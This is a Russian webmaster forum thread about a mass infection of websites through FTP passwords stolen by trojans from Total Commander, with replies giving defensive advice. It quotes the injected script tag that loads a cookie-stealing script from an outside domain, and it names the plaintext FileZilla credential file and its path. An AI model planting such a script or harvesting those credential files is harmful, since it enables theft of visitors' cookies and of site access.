Массовый взлом и заражение сайтов

mymind
На сайте с 07.09.2004
Offline
154
17360

Обнаружил сегодня заражение своих сайтов. По возможности везде прописывалась строка:

<script src="http://yourerating.com/cookiesave.js"></script>

Начал срочно менять пароли на FTP (а это не просто) и убирать последствия. Полез в сеть по поводу этого явления и ничего не нашёл. Пусто. Собственно на акаунте робот пробегается по всем файлам и заражает в основном index.php (htm) файлы, а также config.php, header.php, footer.php, auth.php и т.д. также возможно index.htm, main.htm и похожее

Если на сайте стоит какой-то популярный движок ( Joomla, WordPress, phpBB и т.д. ) то тут заражение идёт полным ходом, причём согласно архитектуре самого движка.

Интегрирует код очень аккуратно, работоспособность сайтов не теряется. Благо у меня все сайты самописные, поэтому аккуратно влезть не получилось.

Срочно начал устранять последствия. В некоторых случаях откат на 7 августа, в некоторых пришлось руками. Пока делал лазал по сети искал информацию. И только час назад начала появляться инфа, что заражаются сайты.

Теперь любопытное. Затронуты были аккаунты которым более 2-3 месяц. Те аккаунты, которые я добавлял в Total Commander ( а на свою безбожную глупость сохранял пароли от ftp именно в нём) месяц 1 - 1,5 назад затронуты не были. Сайты были чисты и невинны.

Предположу, что с месяца 2 назад был сбор ftp аккаунтов троянами (одним или нескольким). Как раз в тот период я только у себя ловил по трояну через каждые 3 дня, которые ни один антивирь не ощущал. Только после отправки в лаборатории со следующим обновлением антивирусы видели эту заразу.

Затем похоже был период подготовки. И сейчас началась активная проработка собранной базы. По датам файлы изменялись 8-го августа и 9-го (т.е. буквально сегодня).

Ну и надо отдать должное создателям этой заразы, что проработали они всё на славу. Внедрённый код не мешает работоспособности большинству сайтов. Я и по своим-то узнал случайно, когда сайты с GZIP архивацией стали выдавать ошибки. Грешил на хостинг, но когда полез узнавать волосы даже подмышками зашевелились.

Будем наблюдать за ситуацией, но судя по тому, что местами стали появляться люди с это проблемой возможно это только начало.

Обмен криптовалют по выгодному курсу Bitpayes.com / Instabit.pro ( https://bitpayes.com http://instabit.pro )
medea
На сайте с 19.09.2007
Offline
297
#1

Предполагаемая причина, как всегда, сбор паролей из тотал коммандера, как я понимаю?

Продвижение сайтов (http://www.iqpromo.ru/) под моим присмотром :)
mymind
На сайте с 07.09.2004
Offline
154
#2
medea:
Предполагаемая причина, как всегда, сбор паролей из тотал коммандера, как я понимаю?

Совершенно верно. И самое любопытное, что я уже на подобной хне обжигался, правда в прошлый раз это было не так больно, и долгое время пароли не хранил, а тут самонадеянность и пр. пр. пр.

greenlen
На сайте с 30.05.2011
Offline
117
#3

mymind, Чем опасен такой зверь? И как защитить тотал от такого вот воровства?

mymind
На сайте с 07.09.2004
Offline
154
#4

greenlen, без понятия. Самый лучший способ обезопаситься не хранит пароли в Total коммандере. Других вариантов походу нет.

Dmytro
На сайте с 04.06.2008
Offline
89
#5

В filezilla пароли хранить тоже не стоит, или только тотал под прицелом?

mymind
На сайте с 07.09.2004
Offline
154
#6

Dmytro, наверняка знать не могу. Будет информация появляться, будет ясно. Еще скажу вот что. Аккаунты, где FTP-ник был доступен только с определённого IP также не пострадали.

В общем совет всем. Не хранить пароли в Total, а если храните то доступ к FTP делайте обязательным только с определённого IP. ну или подсети, если нет постоянки.

greenlen
На сайте с 30.05.2011
Offline
117
#7
Dmytro:
В filezilla пароли хранить тоже не стоит, или только тотал под прицелом?

У меня вообще 11 паролей, в голове все не удержишь, приходится где то хранить. Тем более некоторые, это просто рендомный набор букв и цифр. Куда сливать, что бы не достали, без понятия.

rustelekom
На сайте с 20.04.2005
Online
522
#8

Могу подтвердить - как раз сегодня клиенту бекап восстановливали. Но, у него заражение случилось 7 августа так что вероятно это разница просто из за количество украденных фтп паролей. Логинились сразу, подбора паролей не было. Ай-пи адрес откуда логинились отправили в абуз отдел соответствующего ДЦ.

Сайты это конечно важно но, не забудьте что у вас на компьютере сидит троян/вирус и необходимо его почистить. Пометять пароли стоит не только от фтп но и от всего что у вас используется на компьютере. Взлом почтовых ящиков к примеру никто не отменял.

Неплохо также обратиться к хостеру чтобы он проверил откуда закачивали файлы. Это поможет и хостеру и его другим клиентам да и вам в конечном счете.

Если у вас Windows то есть неплохая программа Roboform. Можно также использовать Lastpass.com Если же у вас линукс то там полно криптовщиков текстовых файлов. Может и не так удобно зато не смогут ничего украсть даже если подцепите трояна. А вообще для виндоуз кардинальный способ избавиться от такого рода проблем - поставить на комп. впс софт типа VirtualBox, воткнуть туда винхп или другую винду и ходить по сайтам только из впски. Ну и не ничего серьезного и нужного в впске не хранить. Переставить ее будет не проблемой в случае чего да и красть там нечего будет :)

SSD VPS, SSD хостинг и выделенные серверы в Германии или РФ, FTP хранилища, регистрация доменов и SSL сертификаты ( https://www.robovps.biz/ ) Контакты: Telegram ( https://t.me/rustelekom_bot )
I
На сайте с 08.08.2011
Offline
0
#9

Сохранять пароли в тотале ни в коем случае нельзя. Многие так именно и делают. А вообще создал документ, записал пароль и убрал его далеко от винды будь то сьёмный диск или самый лучший способ рукопись, до неё уж точно троян не доберётся.

N
На сайте с 28.03.2009
Offline
39
#10
Dmytro:
В filezilla пароли хранить тоже не стоит, или только тотал под прицелом?

Всю сохраненную информацию - хосты, логины, пароли, порты Filezilla хранит в нешифрованном виде (как есть) в файле sitemanager.xml, расположенном в папке

%UserProfile%\Application Data\FileZilla

Так что даже если в FZ пока никто не целился, не надо хранить в ней пароли.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий